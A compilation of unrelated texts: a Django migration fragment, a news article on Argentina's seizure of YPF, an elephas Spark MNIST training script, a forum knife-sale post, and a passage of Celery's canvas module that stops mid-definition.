'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'child_set'", 'blank': 'True', 'null': 'True', 'to': "orm['localtv.Category']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'localtv.author': {
'Meta': {'unique_together': "(('name', 'site'),)"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"})
},
'localtv.feed': {
'Meta': {'unique_together': "(('feed_url', 'site'),)"},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'auto_authors_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'auto_categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'etag': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'feed_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'webpage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'localtv.openiduser': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'unique': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'localtv.profile': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['localtv']
|
Is Argentina Becoming the New Venezuela?
As the dust settles on Argentinean President Cristina Fernandez de Kirchner’s announcement that the state would seize control of assets owned by Repsol-backed energy company YPF, many are worried that other companies will shy away from investment in the South American country.
Argentine President Cristina Fernandez de Kirchner holds a plaque before delivering a speech during a ceremony to mark the 30th Anniversary of the 1982 South Atlantic war between Argentina and the Britain over the Falkland Islands (Malvinas).
Argentina is famously rich in natural resources, but has been handicapped in the past by political and economic turbulence. Many international investors had their fingers burnt by the 2001 Argentinean default, when the country defaulted on $120 billion of sovereign debt, with a recovery value of just 35 cents in the dollar.
The Argentineans are known for their fierce pride in their country, which is what Kirchner is counting on in order to maintain solid domestic support.
Her actions have been applauded by Hugo Chavez, the left-wing president of Venezuela, which recently nationalized its gold industry and has a longer history of seizing other foreign-owned assets, particularly in the oil industry.
The plans come after Argentina has become increasingly vocal about the retention of British power in the Falklands Islands – known as Las Malvinas in Argentina – and a focal point of nationalistic fervor. Argentina has already made life difficult for oil companies prospecting in the seas around the islands.
Kirchner’s opponents on the right wing of Argentina’s politics are less enamoured of the YPF idea, which will be debated in the Senate next week, but worried about speaking out internationally in case of a voter backlash.
Plenty of the biggest companies in Argentina, including banks and most of its telecommunications infrastructure, are owned by Spanish or Italian parent companies, a legacy of colonialism and the links between Argentina and its former European rulers. Already-troubled Spain has easily the biggest exposure to Argentina.
And most of the major international miners, including Rio Tinto and Xstrata , have operations in the resource-rich country.
Resource nationalism is known to be one of the biggest fears of mining companies miners in general, whether it’s countries that hike taxes, as in the case of Australia, or, in worst-case scenarios, nations that seize back their resources.
Argentina was already taxing oil exports heavily, while subsidising domestic consumption, which had sent the country’s oil balance into deficit in 2011 for the first time in more than two decades.
In that context, it is easier to see why Argentina’s government has been acting so aggressively. Argentina’s government is very limited in how much it can borrow from abroad, after devaluing the peso at the height of its last major economic crisis in 2001.
Foreign investment in the country is falling, while capital is leaving in a steady stream as wealthy Argentineans invest elsewhere.
|
from tensorflow.keras.datasets import mnist
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation
from tensorflow.keras.optimizers import SGD
from tensorflow.keras.utils import to_categorical
from elephas.spark_model import SparkModel
from elephas.utils.rdd_utils import to_simple_rdd
from pyspark import SparkContext, SparkConf
# Define basic parameters
batch_size = 64
nb_classes = 10
epochs = 1
# Create Spark context
conf = SparkConf().setAppName('Mnist_Spark_MLP').setMaster('local[8]')
sc = SparkContext(conf=conf)
# Load data
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 784)
x_test = x_test.reshape(10000, 784)
x_train = x_train.astype("float32")
x_test = x_test.astype("float32")
x_train /= 255
x_test /= 255
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# Convert class vectors to binary class matrices
y_train = to_categorical(y_train, nb_classes)
y_test = to_categorical(y_test, nb_classes)
model = Sequential()
model.add(Dense(128, input_dim=784))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(10))
model.add(Activation('softmax'))
sgd = SGD(lr=0.1)
model.compile(sgd, 'categorical_crossentropy', ['acc'])
# Build RDD from numpy features and labels
rdd = to_simple_rdd(sc, x_train, y_train)
# Initialize SparkModel from tensorflow.keras model and Spark context
spark_model = SparkModel(model, mode='asynchronous')
# Train Spark model
spark_model.fit(rdd, epochs=epochs, batch_size=batch_size, verbose=2, validation_split=0.1)
# Evaluate Spark model by evaluating the underlying model
score = spark_model.evaluate(x_test, y_test, verbose=2)
print('Test accuracy:', score[1])
|
Discussion in 'Canada' started by rexromic, Nov 4, 2018.
Boker Cox Anso Limited and numbered,used very lightly few times.Slipjoint,blade is 2.7",N690 Bohler steel,Titanium and Red Micarta scales.Great shape and EDC blade.Made in Solingen Germany.
Shipping included,Paypal goods or EMT.No trades.
|
# -*- coding: utf-8 -*-
"""Composing task work-flows.
.. seealso:
You should import these from :mod:`celery` and not this module.
"""
from __future__ import absolute_import, unicode_literals
import itertools
import operator
import sys
from collections import MutableSequence, deque
from copy import deepcopy
from functools import partial as _partial, reduce
from operator import itemgetter
from kombu.utils.functional import fxrange, reprcall
from kombu.utils.objects import cached_property
from kombu.utils.uuid import uuid
from vine import barrier
from celery._state import current_app
from celery.five import python_2_unicode_compatible
from celery.local import try_import
from celery.result import GroupResult
from celery.utils import abstract
from celery.utils.functional import (
maybe_list, is_list, _regen, regen, chunks as _chunks,
seq_concat_seq, seq_concat_item,
)
from celery.utils.objects import getitem_property
from celery.utils.text import truncate, remove_repeating_from_task
__all__ = [
'Signature', 'chain', 'xmap', 'xstarmap', 'chunks',
'group', 'chord', 'signature', 'maybe_signature',
]
PY3 = sys.version_info[0] == 3
# json in Python 2.7 borks if dict contains byte keys.
JSON_NEEDS_UNICODE_KEYS = PY3 and not try_import('simplejson')
def maybe_unroll_group(g):
"""Unroll group with only one member."""
# Issue #1656
try:
size = len(g.tasks)
except TypeError:
try:
size = g.tasks.__length_hint__()
except (AttributeError, TypeError):
return g
else:
return list(g.tasks)[0] if size == 1 else g
else:
return g.tasks[0] if size == 1 else g
def task_name_from(task):
return getattr(task, 'name', task)
def _upgrade(fields, sig):
"""Used by custom signatures in .from_dict, to keep common fields."""
sig.update(chord_size=fields.get('chord_size'))
return sig
@abstract.CallableSignature.register
@python_2_unicode_compatible
class Signature(dict):
"""Task Signature.
Class that wraps the arguments and execution options
for a single task invocation.
Used as the parts in a :class:`group` and other constructs,
or to pass tasks around as callbacks while being compatible
with serializers with a strict type subset.
Signatures can also be created from tasks:
- Using the ``.signature()`` method that has the same signature
as ``Task.apply_async``:
.. code-block:: pycon
>>> add.signature(args=(1,), kwargs={'kw': 2}, options={})
- or the ``.s()`` shortcut that works for star arguments:
.. code-block:: pycon
>>> add.s(1, kw=2)
- the ``.s()`` shortcut does not allow you to specify execution options
but there's a chaning `.set` method that returns the signature:
.. code-block:: pycon
>>> add.s(2, 2).set(countdown=10).set(expires=30).delay()
Note:
You should use :func:`~celery.signature` to create new signatures.
The ``Signature`` class is the type returned by that function and
should be used for ``isinstance`` checks for signatures.
See Also:
:ref:`guide-canvas` for the complete guide.
Arguments:
task (Task, str): Either a task class/instance, or the name of a task.
args (Tuple): Positional arguments to apply.
kwargs (Dict): Keyword arguments to apply.
options (Dict): Additional options to :meth:`Task.apply_async`.
Note:
If the first argument is a :class:`dict`, the other
arguments will be ignored and the values in the dict will be used
instead::
>>> s = signature('tasks.add', args=(2, 2))
>>> signature(s)
{'task': 'tasks.add', args=(2, 2), kwargs={}, options={}}
"""
TYPES = {}
_app = _type = None
@classmethod
def register_type(cls, name=None):
def _inner(subclass):
cls.TYPES[name or subclass.__name__] = subclass
return subclass
return _inner
@classmethod
def from_dict(cls, d, app=None):
typ = d.get('subtask_type')
if typ:
target_cls = cls.TYPES[typ]
if target_cls is not cls:
return target_cls.from_dict(d, app=app)
return Signature(d, app=app)
def __init__(self, task=None, args=None, kwargs=None, options=None,
type=None, subtask_type=None, immutable=False,
app=None, **ex):
self._app = app
if isinstance(task, dict):
super(Signature, self).__init__(task) # works like dict(d)
else:
# Also supports using task class/instance instead of string name.
try:
task_name = task.name
except AttributeError:
task_name = task
else:
self._type = task
super(Signature, self).__init__(
task=task_name, args=tuple(args or ()),
kwargs=kwargs or {},
options=dict(options or {}, **ex),
subtask_type=subtask_type,
immutable=immutable,
chord_size=None,
)
def __call__(self, *partial_args, **partial_kwargs):
"""Call the task directly (in the current process)."""
args, kwargs, _ = self._merge(partial_args, partial_kwargs, None)
return self.type(*args, **kwargs)
def delay(self, *partial_args, **partial_kwargs):
"""Shortcut to :meth:`apply_async` using star arguments."""
return self.apply_async(partial_args, partial_kwargs)
def apply(self, args=(), kwargs={}, **options):
"""Call task locally.
Same as :meth:`apply_async` but executed the task inline instead
of sending a task message.
"""
# For callbacks: extra args are prepended to the stored args.
args, kwargs, options = self._merge(args, kwargs, options)
return self.type.apply(args, kwargs, **options)
def apply_async(self, args=(), kwargs={}, route_name=None, **options):
"""Apply this task asynchronously.
Arguments:
args (Tuple): Partial args to be prepended to the existing args.
kwargs (Dict): Partial kwargs to be merged with existing kwargs.
options (Dict): Partial options to be merged
with existing options.
Returns:
~@AsyncResult: promise of future evaluation.
See also:
:meth:`~@Task.apply_async` and the :ref:`guide-calling` guide.
"""
try:
_apply = self._apply_async
except IndexError: # pragma: no cover
# no tasks for chain, etc to find type
return
# For callbacks: extra args are prepended to the stored args.
if args or kwargs or options:
args, kwargs, options = self._merge(args, kwargs, options)
else:
args, kwargs, options = self.args, self.kwargs, self.options
# pylint: disable=too-many-function-args
# Borks on this, as it's a property
return _apply(args, kwargs, **options)
def _merge(self, args=(), kwargs={}, options={}, force=False):
if self.immutable and not force:
return (self.args, self.kwargs,
dict(self.options, **options) if options else self.options)
return (tuple(args) + tuple(self.args) if args else self.args,
dict(self.kwargs, **kwargs) if kwargs else self.kwargs,
dict(self.options, **options) if options else self.options)
def clone(self, args=(), kwargs={}, **opts):
"""Create a copy of this signature.
Arguments:
args (Tuple): Partial args to be prepended to the existing args.
kwargs (Dict): Partial kwargs to be merged with existing kwargs.
options (Dict): Partial options to be merged with
existing options.
"""
# need to deepcopy options so origins links etc. is not modified.
if args or kwargs or opts:
args, kwargs, opts = self._merge(args, kwargs, opts)
else:
args, kwargs, opts = self.args, self.kwargs, self.options
s = Signature.from_dict({'task': self.task, 'args': tuple(args),
'kwargs': kwargs, 'options': deepcopy(opts),
'subtask_type': self.subtask_type,
'chord_size': self.chord_size,
'immutable': self.immutable}, app=self._app)
s._type = self._type
return s
partial = clone
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
"""Finalize the signature by adding a concrete task id.
The task won't be called and you shouldn't call the signature
twice after freezing it as that'll result in two task messages
using the same task id.
Returns:
~@AsyncResult: promise of future evaluation.
"""
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
opts = self.options
try:
tid = opts['task_id']
except KeyError:
tid = opts['task_id'] = _id or uuid()
if root_id:
opts['root_id'] = root_id
if parent_id:
opts['parent_id'] = parent_id
if 'reply_to' not in opts:
opts['reply_to'] = self.app.oid
if group_id:
opts['group_id'] = group_id
if chord:
opts['chord'] = chord
# pylint: disable=too-many-function-args
# Borks on this, as it's a property.
return self.AsyncResult(tid)
_freeze = freeze
def replace(self, args=None, kwargs=None, options=None):
"""Replace the args, kwargs or options set for this signature.
These are only replaced if the argument for the section is
not :const:`None`.
"""
s = self.clone()
if args is not None:
s.args = args
if kwargs is not None:
s.kwargs = kwargs
if options is not None:
s.options = options
return s
def set(self, immutable=None, **options):
"""Set arbitrary execution options (same as ``.options.update(…)``).
Returns:
Signature: This is a chaining method call
(i.e., it will return ``self``).
"""
if immutable is not None:
self.set_immutable(immutable)
self.options.update(options)
return self
def set_immutable(self, immutable):
self.immutable = immutable
def _with_list_option(self, key):
items = self.options.setdefault(key, [])
if not isinstance(items, MutableSequence):
items = self.options[key] = [items]
return items
def append_to_list_option(self, key, value):
items = self._with_list_option(key)
if value not in items:
items.append(value)
return value
def extend_list_option(self, key, value):
items = self._with_list_option(key)
items.extend(maybe_list(value))
def link(self, callback):
"""Add callback task to be applied if this task succeeds.
Returns:
Signature: the argument passed, for chaining
or use with :func:`~functools.reduce`.
"""
return self.append_to_list_option('link', callback)
def link_error(self, errback):
"""Add callback task to be applied on error in task execution.
Returns:
Signature: the argument passed, for chaining
or use with :func:`~functools.reduce`.
"""
return self.append_to_list_option('link_error', errback)
def on_error(self, errback):
"""Version of :meth:`link_error` that supports chaining.
on_error chains the original signature, not the errback so::
>>> add.s(2, 2).on_error(errback.s()).delay()
calls the ``add`` task, not the ``errback`` task, but the
reverse is true for :meth:`link_error`.
"""
self.link_error(errback)
return self
def flatten_links(self):
"""Return a recursive list of dependencies.
"unchain" if you will, but with links intact.
"""
return list(itertools.chain.from_iterable(itertools.chain(
[[self]],
(link.flatten_links()
for link in maybe_list(self.options.get('link')) or [])
)))
def __or__(self, other):
# These could be implemented in each individual class,
# I'm sure, but for now we have this.
if isinstance(other, chord) and len(other.tasks) == 1:
# chord with one header -> header[0] | body
other = other.tasks[0] | other.body
if isinstance(self, group):
if isinstance(other, group):
# group() | group() -> single group
return group(
itertools.chain(self.tasks, other.tasks), app=self.app)
# group() | task -> chord
if len(self.tasks) == 1:
# group(ONE.s()) | other -> ONE.s() | other
# Issue #3323
return self.tasks[0] | other
return chord(self, body=other, app=self._app)
elif isinstance(other, group):
# unroll group with one member
other = maybe_unroll_group(other)
if isinstance(self, _chain):
# chain | group() -> chain
sig = self.clone()
sig.tasks.append(other)
return sig
# task | group() -> chain
return _chain(self, other, app=self.app)
if not isinstance(self, _chain) and isinstance(other, _chain):
# task | chain -> chain
return _chain(
seq_concat_seq((self,), other.tasks), app=self._app)
elif isinstance(other, _chain):
# chain | chain -> chain
sig = self.clone()
if isinstance(sig.tasks, tuple):
sig.tasks = list(sig.tasks)
sig.tasks.extend(other.tasks)
return sig
elif isinstance(self, chord):
# chord(ONE, body) | other -> ONE | body | other
# chord with one header task is unecessary.
if len(self.tasks) == 1:
return self.tasks[0] | self.body | other
# chord | task -> attach to body
sig = self.clone()
sig.body = sig.body | other
return sig
elif isinstance(other, Signature):
if isinstance(self, _chain):
if isinstance(self.tasks[-1], group):
# CHAIN [last item is group] | TASK -> chord
sig = self.clone()
sig.tasks[-1] = chord(
sig.tasks[-1], other, app=self._app)
return sig
elif isinstance(self.tasks[-1], chord):
# CHAIN [last item is chord] -> chain with chord body.
sig = self.clone()
sig.tasks[-1].body = sig.tasks[-1].body | other
return sig
else:
# chain | task -> chain
return _chain(
seq_concat_item(self.tasks, other), app=self._app)
# task | task -> chain
return _chain(self, other, app=self._app)
return NotImplemented
def election(self):
type = self.type
app = type.app
tid = self.options.get('task_id') or uuid()
with app.producer_or_acquire(None) as P:
props = type.backend.on_task_call(P, tid)
app.control.election(tid, 'task', self.clone(task_id=tid, **props),
connection=P.connection)
return type.AsyncResult(tid)
def reprcall(self, *args, **kwargs):
args, kwargs, _ = self._merge(args, kwargs, {}, force=True)
return reprcall(self['task'], args, kwargs)
def __deepcopy__(self, memo):
memo[id(self)] = self
return dict(self)
def __invert__(self):
return self.apply_async().get()
def __reduce__(self):
# for serialization, the task type is lazily loaded,
# and not stored in the dict itself.
return signature, (dict(self),)
def __json__(self):
return dict(self)
def __repr__(self):
return self.reprcall()
if JSON_NEEDS_UNICODE_KEYS: # pragma: no cover
def items(self):
for k, v in dict.items(self):
yield k.decode() if isinstance(k, bytes) else k, v
@property
def name(self):
# for duck typing compatibility with Task.name
return self.task
@cached_property
def type(self):
return self._type or self.app.tasks[self['task']]
@cached_property
def app(self):
return self._app or current_app
@cached_property
def AsyncResult(self):
try:
return self.type.AsyncResult
except KeyError: # task not registered
return self.app.AsyncResult
@cached_property
def _apply_async(self):
try:
return self.type.apply_async
except KeyError:
return _partial(self.app.send_task, self['task'])
id = getitem_property('options.task_id', 'Task UUID')
parent_id = getitem_property('options.parent_id', 'Task parent UUID.')
root_id = getitem_property('options.root_id', 'Task root UUID.')
task = getitem_property('task', 'Name of task.')
args = getitem_property('args', 'Positional arguments to task.')
kwargs = getitem_property('kwargs', 'Keyword arguments to task.')
options = getitem_property('options', 'Task execution options.')
subtask_type = getitem_property('subtask_type', 'Type of signature')
chord_size = getitem_property(
'chord_size', 'Size of chord (if applicable)')
immutable = getitem_property(
'immutable', 'Flag set if no longer accepts new arguments')
@Signature.register_type(name='chain')
@python_2_unicode_compatible
class _chain(Signature):
tasks = getitem_property('kwargs.tasks', 'Tasks in chain.')
@classmethod
def from_dict(cls, d, app=None):
tasks = d['kwargs']['tasks']
if tasks:
if isinstance(tasks, tuple): # aaaargh
tasks = d['kwargs']['tasks'] = list(tasks)
# First task must be signature object to get app
tasks[0] = maybe_signature(tasks[0], app=app)
return _upgrade(d, _chain(tasks, app=app, **d['options']))
def __init__(self, *tasks, **options):
tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0])
else tasks)
Signature.__init__(
self, 'celery.chain', (), {'tasks': tasks}, **options
)
self._use_link = options.pop('use_link', None)
self.subtask_type = 'chain'
self._frozen = None
def __call__(self, *args, **kwargs):
if self.tasks:
return self.apply_async(args, kwargs)
def clone(self, *args, **kwargs):
to_signature = maybe_signature
s = Signature.clone(self, *args, **kwargs)
s.kwargs['tasks'] = [
to_signature(sig, app=self._app, clone=True)
for sig in s.kwargs['tasks']
]
return s
def apply_async(self, args=(), kwargs={}, **options):
# python is best at unpacking kwargs, so .run is here to do that.
app = self.app
if app.conf.task_always_eager:
return self.apply(args, kwargs, **options)
return self.run(args, kwargs, app=app, **(
dict(self.options, **options) if options else self.options))
def run(self, args=(), kwargs={}, group_id=None, chord=None,
task_id=None, link=None, link_error=None, publisher=None,
producer=None, root_id=None, parent_id=None, app=None, **options):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
app = app or self.app
use_link = self._use_link
if use_link is None and app.conf.task_protocol == 1:
use_link = True
args = (tuple(args) + tuple(self.args)
if args and not self.immutable else self.args)
if self._frozen:
tasks, results = self._frozen
else:
tasks, results = self.prepare_steps(
args, self.tasks, root_id, parent_id, link_error, app,
task_id, group_id, chord,
)
if results:
if link:
tasks[0].extend_list_option('link', link)
first_task = tasks.pop()
# chain option may already be set, resulting in
# "multiple values for keyword argument 'chain'" error.
# Issue #3379.
options['chain'] = tasks if not use_link else None
first_task.apply_async(**options)
return results[0]
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
_, results = self._frozen = self.prepare_steps(
self.args, self.tasks, root_id, parent_id, None,
self.app, _id, group_id, chord, clone=False,
)
return results[0]
def prepare_steps(self, args, tasks,
root_id=None, parent_id=None, link_error=None, app=None,
last_task_id=None, group_id=None, chord_body=None,
clone=True, from_dict=Signature.from_dict):
app = app or self.app
# use chain message field for protocol 2 and later.
# this avoids pickle blowing the stack on the recursion
# required by linking task together in a tree structure.
# (why is pickle using recursion? or better yet why cannot python
# do tail call optimization making recursion actually useful?)
use_link = self._use_link
if use_link is None and app.conf.task_protocol == 1:
use_link = True
steps = deque(tasks)
steps_pop = steps.pop
steps_extend = steps.extend
prev_task = None
prev_res = None
tasks, results = [], []
i = 0
# NOTE: We are doing this in reverse order.
# The result is a list of tasks in reverse order, that is
# passed as the ``chain`` message field.
# As it's reversed the worker can just do ``chain.pop()`` to
# get the next task in the chain.
while steps:
task = steps_pop()
is_first_task, is_last_task = not steps, not i
if not isinstance(task, abstract.CallableSignature):
task = from_dict(task, app=app)
if isinstance(task, group):
task = maybe_unroll_group(task)
# first task gets partial args from chain
if clone:
task = task.clone(args) if is_first_task else task.clone()
elif is_first_task:
task.args = tuple(args) + tuple(task.args)
if isinstance(task, _chain):
# splice the chain
steps_extend(task.tasks)
continue
if isinstance(task, group) and prev_task:
# automatically upgrade group(...) | s to chord(group, s)
# for chords we freeze by pretending it's a normal
# signature instead of a group.
tasks.pop()
results.pop()
task = chord(
task, body=prev_task,
task_id=prev_res.task_id, root_id=root_id, app=app,
)
if is_last_task:
# chain(task_id=id) means task id is set for the last task
# in the chain. If the chord is part of a chord/group
# then that chord/group must synchronize based on the
# last task in the chain, so we only set the group_id and
# chord callback for the last task.
res = task.freeze(
last_task_id,
root_id=root_id, group_id=group_id, chord=chord_body,
)
else:
res = task.freeze(root_id=root_id)
i += 1
if prev_task:
if use_link:
# link previous task to this task.
task.link(prev_task)
if prev_res and not prev_res.parent:
prev_res.parent = res
if link_error:
for errback in maybe_list(link_error):
task.link_error(errback)
tasks.append(task)
results.append(res)
prev_task, prev_res = task, res
if isinstance(task, chord):
app.backend.ensure_chords_allowed()
# If the task is a chord, and the body is a chain
# the chain has already been prepared, and res is
# set to the last task in the callback chain.
# We need to change that so that it points to the
# group result object.
node = res
while node.parent:
node = node.parent
prev_res = node
return tasks, results
def apply(self, args=(), kwargs={}, **options):
last, fargs = None, args
for task in self.tasks:
res = task.clone(fargs).apply(
last and (last.get(),), **dict(self.options, **options))
res.parent, last, fargs = last, res, None
return last
@property
def app(self):
app = self._app
if app is None:
try:
app = self.tasks[0]._app
except LookupError:
pass
return app or current_app
def __repr__(self):
if not self.tasks:
return '<{0}@{1:#x}: empty>'.format(
type(self).__name__, id(self))
return remove_repeating_from_task(
self.tasks[0]['task'],
' | '.join(repr(t) for t in self.tasks))
class chain(_chain):
"""Chain tasks together.
Each tasks follows one another,
by being applied as a callback of the previous task.
Note:
If called with only one argument, then that argument must
be an iterable of tasks to chain: this allows us
to use generator expressions.
Example:
This is effectively :math:`((2 + 2) + 4)`:
.. code-block:: pycon
>>> res = chain(add.s(2, 2), add.s(4))()
>>> res.get()
8
Calling a chain will return the result of the last task in the chain.
You can get to the other tasks by following the ``result.parent``'s:
.. code-block:: pycon
>>> res.parent.get()
4
Using a generator expression:
.. code-block:: pycon
>>> lazy_chain = chain(add.s(i) for i in range(10))
>>> res = lazy_chain(3)
Arguments:
*tasks (Signature): List of task signatures to chain.
If only one argument is passed and that argument is
an iterable, then that'll be used as the list of signatures
to chain instead. This means that you can use a generator
expression.
Returns:
~celery.chain: A lazy signature that can be called to apply the first
task in the chain. When that task succeeed the next task in the
chain is applied, and so on.
"""
# could be function, but must be able to reference as :class:`chain`.
def __new__(cls, *tasks, **kwargs):
# This forces `chain(X, Y, Z)` to work the same way as `X | Y | Z`
if not kwargs and tasks:
if len(tasks) == 1 and is_list(tasks[0]):
# ensure chain(generator_expression) works.
tasks = tasks[0]
return reduce(operator.or_, tasks)
return super(chain, cls).__new__(cls, *tasks, **kwargs)
class _basemap(Signature):
_task_name = None
_unpack_args = itemgetter('task', 'it')
@classmethod
def from_dict(cls, d, app=None):
return _upgrade(
d, cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']),
)
def __init__(self, task, it, **options):
Signature.__init__(
self, self._task_name, (),
{'task': task, 'it': regen(it)}, immutable=True, **options
)
def apply_async(self, args=(), kwargs={}, **opts):
# need to evaluate generators
task, it = self._unpack_args(self.kwargs)
return self.type.apply_async(
(), {'task': task, 'it': list(it)},
route_name=task_name_from(self.kwargs.get('task')), **opts
)
@Signature.register_type()
@python_2_unicode_compatible
class xmap(_basemap):
"""Map operation for tasks.
Note:
Tasks executed sequentially in process, this is not a
parallel operation like :class:`group`.
"""
_task_name = 'celery.map'
def __repr__(self):
task, it = self._unpack_args(self.kwargs)
return '[{0}(x) for x in {1}]'.format(
task.task, truncate(repr(it), 100))
@Signature.register_type()
@python_2_unicode_compatible
class xstarmap(_basemap):
"""Map operation for tasks, using star arguments."""
_task_name = 'celery.starmap'
def __repr__(self):
task, it = self._unpack_args(self.kwargs)
return '[{0}(*x) for x in {1}]'.format(
task.task, truncate(repr(it), 100))
@Signature.register_type()
class chunks(Signature):
"""Partition of tasks in n chunks."""
_unpack_args = itemgetter('task', 'it', 'n')
@classmethod
def from_dict(cls, d, app=None):
return _upgrade(
d, chunks(*cls._unpack_args(
d['kwargs']), app=app, **d['options']),
)
def __init__(self, task, it, n, **options):
Signature.__init__(
self, 'celery.chunks', (),
{'task': task, 'it': regen(it), 'n': n},
immutable=True, **options
)
def __call__(self, **options):
return self.apply_async(**options)
def apply_async(self, args=(), kwargs={}, **opts):
return self.group().apply_async(
args, kwargs,
route_name=task_name_from(self.kwargs.get('task')), **opts
)
def group(self):
# need to evaluate generators
task, it, n = self._unpack_args(self.kwargs)
return group((xstarmap(task, part, app=self._app)
for part in _chunks(iter(it), n)),
app=self._app)
@classmethod
def apply_chunks(cls, task, it, n, app=None):
return cls(task, it, n, app=app)()
def _maybe_group(tasks, app):
if isinstance(tasks, dict):
tasks = signature(tasks, app=app)
if isinstance(tasks, (group, _chain)):
tasks = tasks.tasks
elif isinstance(tasks, abstract.CallableSignature):
tasks = [tasks]
else:
tasks = [signature(t, app=app) for t in tasks]
return tasks
@Signature.register_type()
@python_2_unicode_compatible
class group(Signature):
"""Creates a group of tasks to be executed in parallel.
A group is lazy so you must call it to take action and evaluate
the group.
Note:
If only one argument is passed, and that argument is an iterable
then that'll be used as the list of tasks instead: this
allows us to use ``group`` with generator expressions.
Example:
>>> lazy_group = group([add.s(2, 2), add.s(4, 4)])
>>> promise = lazy_group() # <-- evaluate: returns lazy result.
>>> promise.get() # <-- will wait for the task to return
[4, 8]
Arguments:
*tasks (Signature): A list of signatures that this group will call.
If there's only one argument, and that argument is an iterable,
then that'll define the list of signatures instead.
**options (Any): Execution options applied to all tasks
in the group.
Returns:
~celery.group: signature that when called will then call all of the
tasks in the group (and return a :class:`GroupResult` instance
that can be used to inspect the state of the group).
"""
tasks = getitem_property('kwargs.tasks', 'Tasks in group.')
@classmethod
def from_dict(cls, d, app=None):
return _upgrade(
d, group(d['kwargs']['tasks'], app=app, **d['options']),
)
def __init__(self, *tasks, **options):
if len(tasks) == 1:
tasks = tasks[0]
if isinstance(tasks, group):
tasks = tasks.tasks
if not isinstance(tasks, _regen):
tasks = regen(tasks)
Signature.__init__(
self, 'celery.group', (), {'tasks': tasks}, **options
)
self.subtask_type = 'group'
def __call__(self, *partial_args, **options):
return self.apply_async(partial_args, **options)
def skew(self, start=1.0, stop=None, step=1.0):
it = fxrange(start, stop, step, repeatlast=True)
for task in self.tasks:
task.set(countdown=next(it))
return self
def apply_async(self, args=(), kwargs=None, add_to_parent=True,
producer=None, link=None, link_error=None, **options):
if link is not None:
raise TypeError('Cannot add link to group: use a chord')
if link_error is not None:
raise TypeError(
'Cannot add link to group: do that on individual tasks')
app = self.app
if app.conf.task_always_eager:
return self.apply(args, kwargs, **options)
if not self.tasks:
return self.freeze()
options, group_id, root_id = self._freeze_gid(options)
tasks = self._prepared(self.tasks, [], group_id, root_id, app)
p = barrier()
results = list(self._apply_tasks(tasks, producer, app, p,
args=args, kwargs=kwargs, **options))
result = self.app.GroupResult(group_id, results, ready_barrier=p)
p.finalize()
# - Special case of group(A.s() | group(B.s(), C.s()))
# That is, group with single item that's a chain but the
# last task in that chain is a group.
#
# We cannot actually support arbitrary GroupResults in chains,
# but this special case we can.
if len(result) == 1 and isinstance(result[0], GroupResult):
result = result[0]
parent_task = app.current_worker_task
if add_to_parent and parent_task:
parent_task.add_trail(result)
return result
def apply(self, args=(), kwargs={}, **options):
app = self.app
if not self.tasks:
return self.freeze() # empty group returns GroupResult
options, group_id, root_id = self._freeze_gid(options)
tasks = self._prepared(self.tasks, [], group_id, root_id, app)
return app.GroupResult(group_id, [
sig.apply(args=args, kwargs=kwargs, **options) for sig, _ in tasks
])
def set_immutable(self, immutable):
for task in self.tasks:
task.set_immutable(immutable)
def link(self, sig):
# Simply link to first task
sig = sig.clone().set(immutable=True)
return self.tasks[0].link(sig)
def link_error(self, sig):
sig = sig.clone().set(immutable=True)
return self.tasks[0].link_error(sig)
def _prepared(self, tasks, partial_args, group_id, root_id, app,
